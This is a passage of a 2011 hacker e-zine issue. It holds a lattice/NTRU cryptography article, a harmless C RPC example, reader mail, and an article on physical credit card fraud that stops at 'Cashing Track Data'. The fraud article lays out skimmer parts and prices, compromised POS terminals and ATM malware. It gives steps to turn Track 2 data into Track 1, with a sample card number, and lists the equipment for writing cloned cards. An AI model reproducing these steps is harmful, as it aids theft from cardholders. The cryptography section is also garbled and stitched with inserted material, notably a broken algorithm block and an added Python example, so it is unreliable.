rootkit related
Published: 2019-05-25


[ASCII cover art: GNY cat logo]

    0x01 Introduction                        || 0x08 MapReduce, Part 2     elchupathingy
    0x02 Feedback + Edits                    || 0x09 Cameras + DVRs Scan           storm
    0x03 Lattice-Based Cryptography   rattle || 0x0a 303-833-00xx Scan     Shadytel, Inc
    0x04 duper's Code Corner           duper || 0x0b bit.ly Shenanigans   Silks, elchupa
    0x05 The Tech Behind Credit Cards   K141 || 0x0c Programming Challenge         storm
    0x06 Brief Notes on Kiosk Hacking  storm || 0x0d The Scoop on LIGATT
    0x07 Linux Rootkit Dev Update      duper || 0x0e Et Cetera, Etc.            teh crew

[==================================================================================================]

                         [================================================]
                                      Go Null Yourself E-Zine
                                   Issue #4 - Spring/April 2011
                                      www.GoNullYourself.org
                           "It makes sense if you don't think about it"
                         [================================================]

[==================================================================================================]

-=[ 0x01 Introduction

Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring!  The sun is shining, the birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to go outside!
For those who still prefer the cool depths of a basement, though, then GNY Zine has all you need in lieu of vitamin D and a social life.  Like crypto!  And rootkits!  And leet ASCII art!

We may not have iced tea, but here's a recipe to make up for it:

    * 8 cups water
    * 3 orange pekoe tea bags
    * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated
    * 1/2 cup lemon juice

    1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags.
       Cover and let steep for 1 hour.
    2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until
       dissolved, then stir in lemon juice. Refrigerate until chilled.

Hey, it got quite a few good reviews and only has 11 Calories.

Anyways, don't want to keep you.  Those 3100 lines below aren't gonna read themselves.  Enjoy the zine, and see ya in the summer.

Notable Events
==============

    January 2011 - Leak of LIGATT Security/Gregory D. Evans
    January 31, 2011 - Go Null Yourself turns 3-years-old
    February 3, 2011 - Exhaustion of remaining IPv4 address space
    February 2011 - Leak of HBGary, Inc.

-=-=-

Now, on to formalities...

If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication.  Content may take many forms, whether it be a paper, review, scan, or first-hand account of an event.  Submissions of ASCII cover art that display the GNY logo in some way are also appreciated.  Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.  We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture.
Both technical and non-technical material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via:

    - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny)
    - Email (zine@gonullyourself.org)

If there is enough feedback, we will publish some of the messages in future issues.  Our PGP key is available for use below.

We have devoted a lot of effort into this publication and hope that you learn something from reading it.  Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication.  Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)
-----END PGP PUBLIC KEY BLOCK-----

[==================================================================================================]

-=[ 0x02 Feedback and Edits

We always strive to publish accurate information in GNY Zine, but we the authors and editors are in fact human beings and are subject to making mistakes from time to time, despite our best efforts.  The publication, compilation, and distribution of this e-zine is derived entirely from our passion for technology and curiosity of how things tick.  GNY Zine has no commercial influences.  If you find that there is an error in content that we have published, please do not hesitate to email us so that it may be announced and corrected in the next issue.
Not acting like a stuck-up elitist about it will probably invoke a more positive response too.

With that being said, we are also receptive to content or personal experiences relevant to information presented in past issues.  If you've written some code, applied a concept in a new way, or just want to voice your opinion about a topic, send us an email!

We may be contacted at: zine@gonullyourself.org
(PGP key is available in the Introduction)

Please note that emails we like will be published in future issues, so specify if you wish for your message to remain private or if you wish for us to redact certain personal information from it.

----------------------------------------------------------------------------------------------------

Turning Manning into the Feds turns an institution with relatively unlimited power against Manning.  The techniques used by Lamo were a betrayal of trust given (arguably without having been earned) to Lamo.  Lamo is a snitch by definition.  The fact that he still has hosting on domains like resist.ca is further evidence that resist.ca can not be trusted as an anarchist resource.

The panel at HOPE in which Lamo was confronted framed the hacker community as one that is filled with snitches.  Members of the panel told stories about how they were turned in by people they collaborated with and trusted.  Behavior like this closes doors to the flow of information, welcomes the violence of authoritarian institutions, and sets the foundation for the privatization of security research.  Behavior like Lamo's is in opposition to the safety and values of the hacker community, and as a result should not be allowed space.  Idolizing individuals who act with such a disregard for the hacker community they claim to be a part of with a glowing expose is a disgrace to the hacker community.

With disgust,
evoltech

>> Thanks for sending us your opinion.
>> Though, we checked and it seems like Adrian's website is currently 404'ing (for those of you who
>> didn't read the interview from issue #2, the URL is http://users.resist.ca/~adrian/).  We actually
>> followed up on this and contacted resist.ca about it, who replied:

Hi there,

Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca.  We removed his various accounts because his motivations seem to be in conflict with ours (see http://www.youtube.com/watch?v=ebLahUUr__s).  Our project is politically motivated and we offer services to projects that share our political alignment.  Adrian's activities around the wikileaks debacle suggest to us that he doesn't actually align with us politically.

For more information on the kinds of political activism we support, please read our mission statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis

--
The resist.ca collective

>> So, there you go.

[==================================================================================================]

-=[ 0x03 Lattice-Based Cryptography
-=[ Author: rattle
-=[ Website: http://www.awarenetwork.org/

[ASCII banner: "post-quantum" / A Lattice-Based Crypto System / rattle // born // tobi]

-- 0 Requirements --------------------------------------------------------------

I will expect readers to have a basic grasp of (linear) algebra.
The terms I will use without further explanation are the following:

 - vector
 - linear independence
 - matrix
 - rank of a matrix
 - transpose of a matrix
 - scalar products
 - quotient rings Z(q) = { 0, ..., q-1 } (where all operations are performed modulo q)

I also expect the reader to have a certain idea of computational complexity, if even only the roughest. You should have heard of the following notions:

 - Big-O notation (Landau symbols)
 - Time/Space complexity of an algorithm

I really can not give a complete introduction to these topics here. I would recommend literature, but all the undergraduate books on these topics that I know are in German.

---- 0.1 Notation --------------------------------------------------------------

When A is some (n x m)-matrix (this means it has n rows and m columns), then the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly, if a is a vector (which is just a (n x 1)-matrix), we will denote the i-th entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.

The canonical basis of real space will be denoted by e(1)...e(n), which are the vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise.

We will denote the real numbers by R, the integer numbers by Z. The notation X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set, otherwise it means multiplying X with itself n times, duh.

In real space, if a and b are vectors, we denote by

    = a[1]·b[1] + ··· + a[n]·b[n]

the Euclidean scalar product.

-- 1 Introduction --------------------------------------------------------------

Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spanned by these vectors is the set

    L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }

of all integer linear combinations of them. The following is an example in R^2: each lattice point is marked by an x and the 'grid' has been ASCII-modelled for your convenience.

    ^
  7 |             x             x
  6 |     x             x             x
  5 |           x             x
  4 |   x             x             x
  3 |         x             x
  2 | x             x             x
  1 |       x             x             x
    +------------------------------------>
             5         10        15

    Figure 1: Example of a two-dimensional Lattice

Now, consider the following picture. We have added a "target" vector (marked €) and a circle around it intersecting the closest lattice point, which is p=(5,3) in this case.

    ^
  7 |             x             x
  6 |     x             x             x
  5 |           x             x
  4 |   x             x             x
  3 |         p€            x
  2 | b             x             x
  1 |       a             x             c
    +-------------d---------------------->
             5         10        15

    Figure 2: Lattice with target vector

Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On the other hand, using the basis c=(18,1) and d=(7,0), the same point has the less simple description p = 3·c - 7·d. When passing to higher dimensions, this phenomenon escalates drastically.
This way, we obtain a computational problem that varies from easy to virtually impossible to solve, depending very much on the lattice basis used.

---- 1.1 Lattice Problems ------------------------------------------------------

Let L be a lattice and g some real value greater or equal to one. We denote by d(x,y) the distance from the point x to the point y. The lattice approximation problems are the following:

CLOSEST VECTOR PROBLEM -- CVP(g): For any vector t in R^n, let y be the lattice point closest to t. The task is to find a lattice point x not equal to t such that d(x,t) is less or equal to g·d(y,t). In other words, x is no further from t than g times the distance from t to any lattice point.

SHORTEST VECTOR PROBLEM -- SVP(g): Find a vector x such that x is no longer than g times the shortest lattice vector. This is the special case of the CVP where t=(0,...,0) is the origin.

We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.

---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------

Based on these problems, we can build an asymmetric cryptosystem, which is roughly described as follows:

 a) Choose a random "good" basis and keep it as a private key.
 b) Hand out a "bad" basis for the same lattice as a public key.
 c) Somehow find a way to encode your messages as lattice points.
 d) Encrypt a lattice point by simply distorting it randomly by a small vector.
 e) Decryption now means that you have to find the lattice point closest to the distorted vector (because it was the original message). This is now equivalent to solving the CVP, which should only be possible when in possession of a "good" basis.

---- 1.3 Analysis of SVP -------------------------------------------------------

We now give a brief historical analysis of the hardness of the SVP(g) - one should note here that the CVP(g) is harder than the SVP(g), therefore it would suffice if the SVP(g) was hard to solve.
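The good-basis/bad-basis effect from Figure 2 and the decryption step (e) above can be reproduced in a few lines. The following is an added example, not code from the zine: it takes the article's two bases a=(4,1), b=(1,2) and c=(18,1), d=(7,0), checks that they span the same lattice, and runs Babai's rounding procedure (express the target in the basis, round each coordinate, map back) against both. The target vector is a constructed value slightly above p=(5,3); the exhaustive search is only there to confirm which lattice point really is closest.

```python
"""Closest-vector search with a "good" and a "bad" basis of the same lattice.

Added example, not from the zine.  Reproduces Figure 2: a=(4,1), b=(1,2) and
c=(18,1), d=(7,0) span the same lattice, and p=(5,3) is the lattice point
closest to the target.  Babai's rounding is the "decryption" sketched in 1.2:
with the short, nearly orthogonal basis it returns the true closest point,
with the long skewed basis it does not.  TARGET is a constructed value.
"""
from fractions import Fraction
from itertools import product

GOOD = ((4, 1), (1, 2))      # a, b from the article
BAD = ((18, 1), (7, 0))      # c, d from the article
TARGET = (Fraction(54, 10), Fraction(34, 10))   # constructed: just above p=(5,3)


def det(basis):
    (a1, a2), (b1, b2) = basis
    return a1 * b2 - a2 * b1


def coords(basis, v):
    """Real coordinates (alpha, beta) with v = alpha*B[0] + beta*B[1] (Cramer's rule)."""
    (a1, a2), (b1, b2) = basis
    d = det(basis)
    alpha = (Fraction(v[0]) * b2 - Fraction(v[1]) * b1) / d
    beta = (Fraction(a1) * v[1] - Fraction(a2) * v[0]) / d
    return alpha, beta


def same_lattice(basis1, basis2):
    """Two bases span the same lattice iff every vector of each one has
    integer coordinates with respect to the other."""
    return (all(c.denominator == 1 for v in basis2 for c in coords(basis1, v))
            and all(c.denominator == 1 for v in basis1 for c in coords(basis2, v)))


def babai_round(basis, t):
    """Babai's rounding: write t in the basis, round each coordinate to the
    nearest integer, map back.  Only reliable with a 'good' basis."""
    alpha, beta = coords(basis, t)
    k1, k2 = round(alpha), round(beta)
    (a1, a2), (b1, b2) = basis
    return (k1 * a1 + k2 * b1, k1 * a2 + k2 * b2)


def dist2(u, v):
    return (u[0] - v[0]) ** 2 + (u[1] - v[1]) ** 2


def brute_force_cvp(basis, t, bound=10):
    """Reference answer: exhaustive search over small coefficient ranges."""
    (a1, a2), (b1, b2) = basis
    best, best_d2 = None, None
    for k1, k2 in product(range(-bound, bound + 1), repeat=2):
        v = (k1 * a1 + k2 * b1, k1 * a2 + k2 * b2)
        d2 = dist2(v, t)
        if best_d2 is None or d2 < best_d2:
            best, best_d2 = v, d2
    return best


def demo():
    """Compare the true closest point with what each basis yields under rounding."""
    truth = brute_force_cvp(GOOD, TARGET)
    good_guess = babai_round(GOOD, TARGET)
    bad_guess = babai_round(BAD, TARGET)
    return {
        "same_lattice": same_lattice(GOOD, BAD),
        "closest": truth,
        "good_basis_guess": good_guess,
        "good_basis_dist2": dist2(good_guess, TARGET),
        "bad_basis_guess": bad_guess,
        "bad_basis_dist2": dist2(bad_guess, TARGET),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the good basis the coordinates of the target are about (1.06, 1.17) and round to (1, 1), i.e. p = a + b. With the bad basis they are about (3.4, -7.97) and round to (3, -8), which lands at (-2, 3), a lattice point but far from the target; the "public" basis is useless for decryption even though it describes exactly the same lattice.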
And indeed, from the algorithms known so far, it seems that we can either achieve a polynomial runtime or a polynomial approximation factor, but not both:

    +--------+--------------+--------+-------------------------------------+
    | g      | Runtime      | Space  | Reference                           |
    +--------+--------------+--------+-------------------------------------+
    | 1      | 2^O(n)       | 2^O(n) | [JHLW11, Combinatorial SVP-Solver]  |
    | 1      | 2^O(n log n) | poly   | [Kan83]                             |
    | poly   | 2^O(n)       | 2^O(n) | [MR09]                              |
    | 2^O(n) | poly         | ?      | [LLL82]                             |
    +--------+--------------+--------+-------------------------------------+

This has led to the following conjecture:

Conjecture 1.1. There is no polynomial time algorithm that approximates lattice problems to within polynomial factors.

As far as exponential-time exact solvers are concerned, they have become practical even for small instances just in the recent years:

    +------+-------------------------+----------+-----------+
    | Year | Authors                 | Time     | Space     |
    +------+-------------------------+----------+-----------+
    | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n)   | 2^O(n)    |
    | 2004 | Regev                   | 2^(16n)  | 2^(8n)    |
    | 2008 | Nguyen, Vidick          | 2^(5.9n) | 2^(3n)    |
    | 2010 | Pujol, Stehlé           | 2^(2.5n) | 2^(1.2n)  |
    +------+-------------------------+----------+-----------+

One should note, however, that lattice reduction methods such as [LLL82] seem to perform better in practice than their theoretic worst-case guarantees suggest. This is not fully explained yet, but has experimental evidence: In [GN08], different algorithms and several distributions on lattices were compared with the result that they provide an approximation ratio of roughly g=d^n where d is close to 1.012. Still, it seems that approximation ratios of (1.01)^n are outside the reach of known lattice reduction algorithms.

We should note that for

    $g > \sqrt{n / \log n}$

the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you should read this as "is not NP-hard").
However, it was shown in [Ajt98] that the SVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms known that perform better than the classical ones. Because of this, lattice-based cryptography is often labelled "post-quantum" cryptography. In summary, we may very well assume that the SVP is a hard problem.

-- 2 NTRU ----------------------------------------------------------------------

We will now present a practical implementation of the rough idea presented in subsection 1.2. For the mathematically inclined, a detailed explanation of why the encryption scheme really works the way we outlined in 1.2 can be found in [JHLW11].

---- 2.1 Mathematical Necessities ----------------------------------------------

We first require a couple of mathematical definitions and results, since NTRU operates on a very special kind of lattices.

Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1, with all operations performed modulo q. We denote by p: Z --> Z(q) the map that sends any number n to (n mod q). When A is a matrix with integer entries, we denote by p(A) the matrix with entries in Z(q) which is obtained by reducing all entries modulo q.

Definition 2.2. Let v in R^n be a vector and A an (n x n)-matrix. We then define the matrix

    $(A*v) := \begin{pmatrix} v[1] & (A\cdot v)[1] & \cdots & (A^{n-1}\cdot v)[1] \\ \vdots & \vdots & & \vdots \\ v[n] & (A\cdot v)[n] & \cdots & (A^{n-1}\cdot v)[n] \end{pmatrix}$

whose i-th column is the result of applying A exactly (i-1) times to v. We also define the special (n x n)-matrix

    $T := \begin{pmatrix} 0 & \cdots & \cdots & 0 & 1 \\ 1 & 0 & & & 0 \\ 0 & 1 & \ddots & & \vdots \\ \vdots & & \ddots & 0 & \vdots \\ 0 & \cdots & 0 & 1 & 0 \end{pmatrix}$

(a 1 in the top-right corner and the identity matrix of size n-1 in the lower-left block) and will make frequent use of the matrix (T*v), which is the matrix whose i-th column is just v, rotated by i.

Lemma 2.3. For any two vectors f and g,

 1) (T*f)·g = (T*g)·f
 2) T·(T*f) = (T*f)·T
 3) (T*f)·(T*g) = (T*((T*f)·g))

Proof.
Consider the (k x k)-matrices

    $I(k) := \begin{pmatrix} 0 & \cdots & 0 & 1 \\ 0 & \cdots & 1 & 0 \\ \vdots & & & \vdots \\ 1 & 0 & \cdots & 0 \end{pmatrix}$

(the 1s sit on the anti-diagonal) and the symmetrical (n x n)-matrices

    $S(k) := \begin{pmatrix} I(k) & 0 \\ 0 & I(n-k) \end{pmatrix}.$

Then, we have

    $(T*g)\cdot f = \begin{pmatrix} g[1] & g[n] & \cdots & g[2] \\ g[2] & g[1] & \cdots & g[3] \\ \vdots & \vdots & & \vdots \\ g[n] & g[n-1] & \cdots & g[1] \end{pmatrix} \cdot f =: h$

And clearly, (T*f)·g = h. This proves part (1) already. For the second statement, we calculate (all index operations are performed modulo n):

    $\sum_{k=1}^{n} (S(i-1)\cdot f)[k] \cdot ((T^{j})\cdot g)[k]$
    $= \sum_{k=1}^{i-1} f[i-k]\cdot g[k-j] + \sum_{k=i}^{n} f[n+i-k]\cdot g[k-j]$
    $= \sum_{k=2}^{i} f[i-k+1]\cdot g[k-j-1] + \sum_{k=i+1}^{n+1} f[n+i-k+1]\cdot g[k-j-1]$
    $= \sum_{k=1}^{i} f[i-k+1]\cdot g[k-j-1] + \sum_{k=i+1}^{n} f[n+i-k+1]\cdot g[k-j-1]$

which yields, column by column (recall from Definition 2.2 that the j-th column of (T*h) is T^(j-1)·h),

    $T^{j-1}\cdot h = (T*h)_j .$

With this, it is now obvious that

    $(T*f)\cdot(T*g) = \begin{pmatrix} f[1] & f[n] & \cdots & f[2] \\ f[2] & f[1] & \cdots & f[3] \\ \vdots & \vdots & & \vdots \\ f[n] & f[n-1] & \cdots & f[1] \end{pmatrix} \cdot \begin{pmatrix} g[1] & g[n] & \cdots & g[2] \\ g[2] & g[1] & \cdots & g[3] \\ \vdots & \vdots & & \vdots \\ g[n] & g[n-1] & \cdots & g[1] \end{pmatrix} = (T*h).$

q.e.d.

Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f in Z^n is called a d-vector if it has exactly d negative and d+1 positive entries.

---- 2.2 The NTRU Cryptosystem -------------------------------------------------

We can now describe the process of key generation for the NTRU cryptosystem:

________________________________________________________________________________
Algorithm 1: NTRU-KEY-GENERATION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p
    $\sum_{j=1}^{n} \big( (T*f)[i,j]\cdot m[j] + (T*g)[i,j]\cdot r[j] \big)$
    $= \sum_{j=1}^{n} \big( (T^{j-1}\cdot f)[i]\cdot m[j] + (T^{j-1}\cdot g)[i]\cdot r[j] \big)$
    $= \sum_{j=1}^{n} \big( f[i-j+1]\cdot m[j] + g[i-j+1]\cdot r[j] \big)$

We write f' := f - e(1), which is the vector chosen in step 1 of the NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is maximized for

    f'[i-j+1] = -p if m[j] = -1,   p if m[j] = 1
    g[i-j+1]  = -p if r[j] = -1,   p if r[j] = 1

Since f=f'+e(1), we get

    |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1,

yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d.

-- 3 Further Reading -----------------------------------------------------------

If you would like to read the full-blown math article, it is reference [JHLW11] and the URL to the PDF is given below.

---- 3.1 References ------------------------------------------------------------

[LLL82]  A.K. Lenstra, H.W. Lenstra, and L. Lovász, Factoring polynomials with rational coefficients, Math. Ann. 261 (1982), 515-534.
[Kan83]  Ravi Kannan, Improved algorithms for integer programming and related lattice problems, In Proc. 15th ACM Symp. on Theory of Computing (STOC) (1983), 193-206.
[Ajt98]  M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized reductions, Proc. of 30th STOC. ACM (1998), 10-19.
[GN08]   N. Gama and P.Q. Nguyen, Predicting lattice reduction, Advances in Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer 2008.
[MR09]   D.J. Bernstein, J. Buchmann and E. Dahmen, Post Quantum Cryptography, chapter Lattice-based Cryptography by Daniele Micciancio and Oded Regev, 147-191, Springer 2009.
[JHLW11] Jesko Huettenhain, Lars A. Wallenborn, Lattice-Based Methods, Seminar Topics in Post-Quantum Cryptography (2011), http://www.uni-bonn.de/~rattle/works/lattices.pdf

-----------------------------------------------------------------------[ eof ]--

[==================================================================================================]

-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

[ASCII banner: duper's code corner]

/**
 * Code for creating the client and server sides of a Transport
 * Independent Remote Procedure Call "Hello World" in Linux
 *
 * i.e. not based on the SunRPC code of glibc
 *
 * Super-user access is not required, only a running portmapper.
 */

/* create-tcp-rpc-server.c */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>   /* IPPROTO_TCP */
#include <rpc/rpc.h>      /* SVCXPRT, svctcp_create, svc_register, svc_run (libtirpc) */

/**
 * gcc -o create-tcp-rpc-server create-tcp-rpc-server.c -ltirpc
 */
void vexit(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

/* Called by svc_run() for every request that arrives on the transport. */
void dispatch(struct svc_req *request, SVCXPRT *xprt)
{
    int result = 0;
    FILE *afile = fopen("/tmp/a.txt", "a");
    if(!afile) vexit("fopen");
    fputs("Hello World!\n", afile);
    fclose(afile);
    /* Send a reply, otherwise the client's rpc_call() waits until it times out. */
    if(!svc_sendreply(xprt, (xdrproc_t)xdr_int, (char *)&result))
        svcerr_systemerr(xprt);
    return;
}

int main(void)
{
    SVCXPRT *svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0);
    if(!svcxprt) vexit("svctcp_create");
    printf("xp_sock: %d\n", svcxprt->xp_sock);
    printf("xp_port: %d\n", svcxprt->xp_port);
    /* Program number 101337, version 1, registered with the portmapper for TCP. */
    if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1)
        vexit("svc_register");
    svc_run();          /* never returns */
    exit(EXIT_SUCCESS);
}

/* create-tcp-rpc-client.c */
#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>      /* rpc_call, clnt_perrno, xdr_int (libtirpc) */

/**
 * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
 */
void clnt_vexit(enum clnt_stat value)
{
    clnt_perrno(value);
    exit(EXIT_FAILURE);
}

int main(void)
{
    /* The argument and result must be real int storage: rpc_call() XDR-encodes
     * the argument and decodes the server's reply into the result buffer. */
    int in = 0, out = 0;
    enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1,
                                (xdrproc_t)xdr_int, (char *)&in,
                                (xdrproc_t)xdr_int, (char *)&out, "tcp");
    if(s != RPC_SUCCESS) clnt_vexit(s);
    exit(EXIT_SUCCESS);
}

[==================================================================================================]

-=[ 0x05 The Tech Behind Credit Card Fraud
-=[ Author: K141

[[ Introduction ]]
---------------

Plastics carding is by far the most profitable type of credit card fraud - the replication, or spoofing, of magnetic stripe data to a secondary suitable medium host (magstripe card) being the most common form. I have written this paper to address the followed criminal procedures while explaining these steps as basically as possible. There are numerous papers and articles released that do not even touch the issues at hand; how these criminals obtain this information and more generally, who does what in the spectrum of physical carding.

While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding done, it still stands as a major contender. Technologies exist which could eradicate this type of attack; however, we see no intention of this from the banks as it involves critical changes in the current infrastructure. To date, I see no tech-related reason why this form of fraud is still allowed to be committed.

[[ Track Data ]]
------------

Within a credit card (high-coercive magnetic stripe card), there exist 3 tracks of data (3 sections that are capable of storing data separately). This paper will cover the logical side of magstripe encoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track, polarities and coercivity.
After reading, you should be more familiar with the processes involved inhow criminals obtain and handle this data to produce profits.The majority of the time, Track 1 data is not needed for cashing out with plastics. This is theinformation that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist someterminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will alwaysfill their Track 1 field. Luckily for the attacker, Track 1s can be generated entirely based onTrack 2 data. It is important to mention that Track 1 is derived from the information on Track 2 andis often used as a fail-safe if Track 2 is or can not be read. This is also the only track thataccepts alphanumeric characters.Track 2 data is the most important for 'cashing out'. This is where the relevant information forgenerating Track 1 data is held, as well as other data that allows a transaction to occur.Track 3 data, mostly, is null.Before a transaction may occur, a PIN is necessary for authentication. With that said, generallyspeaking, Track 2 data + PIN = the ability to cash out with that card.[[ Obtaining Track Data ]] -----------------------On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". Thesesellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimumamount' in order to successfully defraud at least $300 or so to make the scam worth their while. Ifa seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knowsthe balance of the said account and knows this to be low. There do exist some legitimate sellers;however, the data they sell is typically Track 2 only and can only be cashed out by the minority ofthe carding community.That being said, online vendors are not the only source of 'dumps'. 
An assailant may obtain Track 2data with PINs by either building or buying their own card skimmer.[[ ATM Skimming ]] --------------A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track databefore the card is legitimately read by the machine. As the victim's credit card is entered into theATM, it passes through the false fascia (the skimming device) and the Track 2 section passes overthe Track 2 read head, stealing the information. As it only passes over the read head, this card isstill able to enter the ATM machine and offer the same functionality as an un-tampered ATM.If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse itinto a file on its storage medium, and also timestamp this data for later reference to thetimestamped video footage of pin entry. These skimmers must then be collected from the ATM after theattack is complete (usually during early hours in the morning to avoid detection, or when thebattery has run low).If the skimming device is coupled with a pin-pad overlay, it will transmit Track 2 data and PIN viaSMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught andconcurrently allowing remote operation. These skimmers will only need to be re-visited when thebattery runs low.An ATM skimming device is comprised of a few components: - Fascia: To overlay the ATM mouth without suspicion. - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note, ideally a skimmer will read only one track of information, as to keep the size of the device minimal. - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed memory locations, usually a Micro-SD card or to the Bluetooth module. - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting Track 2 data, along with PINs back to the carder. 
- Battery: To power the device.The components required to build these devices are inexpensive, but the main obstacle towards thebuilding of a skimmer is technical know-how. I have found the price of pre-built skimmers currentlyto range from $600-$8000, as opposed to $100-700 in building costs.[[ POS Skimming ]] --------------Point of sale skimming is a software-based attack in which the firmware of the POS terminal isflashed, rather than a physical device inserted. Common models are the VeriFone Vx510 and variousother Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target willbelieve he/she is making a purchase with their card, and a transaction will appear to process alongwith a receipt print, but no charge will actually occur. Instead, the card has just been swiped andthe target has entered their PIN. A flashed firmware can be programmed to output a later receiptwith all three track details, as well as PIN, or designed to save to file for later use. Theseskimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forciblyissued to comply or offered a percentage of all money made. An attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumpsare encrypted, with the seller holding the encryption key. This forces the buyer to return to theseller, send the encrypted file, and in return, receive only a percentage of the original skimmedcards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000. [[ Obtaining Track Data Through Malware ]] --------------------------------------Although rare, ATM malware is an uprising issue among those in the carding community. After thesuccess of the Diebold Ghost trojan, there have been countless requests and confirmations ofdevelopment for malware designed on specific platforms, namely the Windows CE environment, afavourite among ATM systems. 
This malware will effectively log all read card data and PINs, printing them to a file encrypted by
the malware for later collection. Alternatively, some variants have even offered to print off all
stolen credentials in a 'bank statement' format by using the ATM's printer. Needless to say, the
deployment of this malware originates from an insider, usually employed or hired by the criminals
to infect the ATM system from an ATM technician role.

[[ Converting Track Data ]]
-----------------------

Track 2 data will often appear in the following format:

5281169568596016=14101010000045100001
^               ^^   ^       ^--CVV
|               ||   |
|               ||   Service code
|               |Expiration date
|               Field separator
Card number

Where:

5281169568596016 = credit card number
14               = expiry year
10               = expiry month
101              = service code
451              = CVV

To generate Track 1 information from a Track 2 field, one must follow these simple steps:

1. Add a 'B' before the credit card number.
2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.
3. Add six '0's after the T2 data.

Thus, our outputted Track 1 data should read as follows:

B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000

[[ Writing Track Data ]]
--------------------

Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blank
medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high
quality printing. Services offered typically cost around $15 per card. If the attacker is running a
large operation then he/she may even purchase the printing equipment themself. This is comprised of:

 - Hi-Co Magnetic Stripe PVC Cards
 - PVC Printer (Zebra printers are well known for this purpose)
 - PVC card embosser (to emboss credentials on the card)
 - PVC card tipper (to tip the embossing with silver/gold)
 - Signature Panels (on the reverse of the card, often left out by inexperienced carders)
 - Holograms (typically stickers or hot-roll stamps)

The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity.
This is the magnetic field strength needed to write data to the stripe of a Hi-Co card. All
credit/bank cards will be Hi-Co and, thus, need the appropriate device to be written to. Any device
capable of writing at a coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable.
Note that most standard magstripe readers can read Hi-Co cards; coercivity only comes into question
in the writing process.

The most common Hi-Co magnetic stripe writers are the MSR-206 and MSR-606. The supplied software
packages that come with these writers are extremely easy to operate, and it is only a matter of
copying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and
swiping the blank card through the writer.

[[ Cashing Track Data ]]
--------------------

After this initial attack is complete, the attacker has two options to produce profit:

